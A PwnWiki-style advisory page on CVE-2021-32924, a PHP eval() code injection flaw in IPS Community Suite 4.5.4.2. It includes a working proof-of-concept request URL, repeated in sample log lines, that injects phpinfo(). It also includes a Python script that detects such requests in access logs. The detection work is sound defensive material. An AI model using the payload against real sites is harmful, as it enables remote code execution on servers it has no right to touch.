CVE-2021-32924 IPS Community Suite 4.5.4.2 PHP Code Injection Vulnerability

From PwnWiki
Revision as of 10:44, 1 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

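Introduction

IPS Community Suite versions 4.5.4.2 and earlier contain a PHP code injection vulnerability. The vulnerability exists because the IPS\cms\modules\front\pages\_builder::previewBlock() method allows arbitrary content to be passed to the IPS\_Theme::runProcessFunction() method, where it is used in a call to the PHP eval() function. This can be exploited to inject and execute arbitrary PHP code. Successful exploitation requires an account with permission to manage the sidebar (for example a moderator or administrator) and the "cms" application to be enabled.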

POC

http://[host]/[ips]/index.php?app=cms&module=pages&controller=builder&do=previewBlock&block_plugin=stats&block_template_use_how=copy&block_plugin_app=core&_sending=block_content&block_content=RCE%0ACONTENT;}}phpinfo();die;/*
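
For triage of web server logs, the following added example (not part of the original page and not IPS code) flags requests that reach the previewBlock route with a block_content parameter. The access-log format, the sample lines and the breakout heuristic (more "}}" than "{{", or an unterminated "/*") are assumptions made for illustration, and only query strings are inspected, so content sent in a POST body is not covered.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request target inside a combined-format access-log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def query_params(target):
    """Split on '&' only, so ';' inside block_content stays part of the value."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params

def looks_like_breakout(content):
    """Heuristic (assumption): more '}}' than '{{', or an unterminated '/*'."""
    unbalanced = content.count("}}") > content.count("{{")
    open_comment = content.rfind("/*") > content.rfind("*/")
    return unbalanced or open_comment

def classify(log_line):
    """Return None (not relevant), 'review' or 'alert' for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    p = query_params(m.group(1))
    # PHP method names are case-insensitive, so compare the route in lower case.
    route = tuple(p.get(k, "").lower() for k in ("app", "controller", "do"))
    if route != ("cms", "builder", "previewblock") or "block_content" not in p:
        return None
    return "alert" if looks_like_breakout(p["block_content"]) else "review"

# Constructed sample log lines (documentation IP addresses, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2021:10:44:00 +0000] "GET /index.php?app=cms'
    '&module=pages&controller=builder&do=previewBlock&block_plugin=stats'
    '&block_template_use_how=copy&block_plugin_app=core&_sending=block_content'
    '&block_content=RCE%0ACONTENT;}}phpinfo();die;/* HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jun/2021:10:45:10 +0000] "GET /index.php?app=cms'
    '&module=pages&controller=builder&do=previewBlock'
    '&block_content=%7B%7Bif+true%7D%7DHi%7B%7Bendif%7D%7D HTTP/1.1" 200 340',
    '198.51.100.9 - - [01/Jun/2021:10:46:30 +0000] "GET /index.php?app=forums'
    '&module=forums&controller=topic&id=5 HTTP/1.1" 200 9100',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split(" ", 1)[0])
```

A "review" result still deserves a look at which account made the request, since the route is only reachable by accounts that can manage the sidebar.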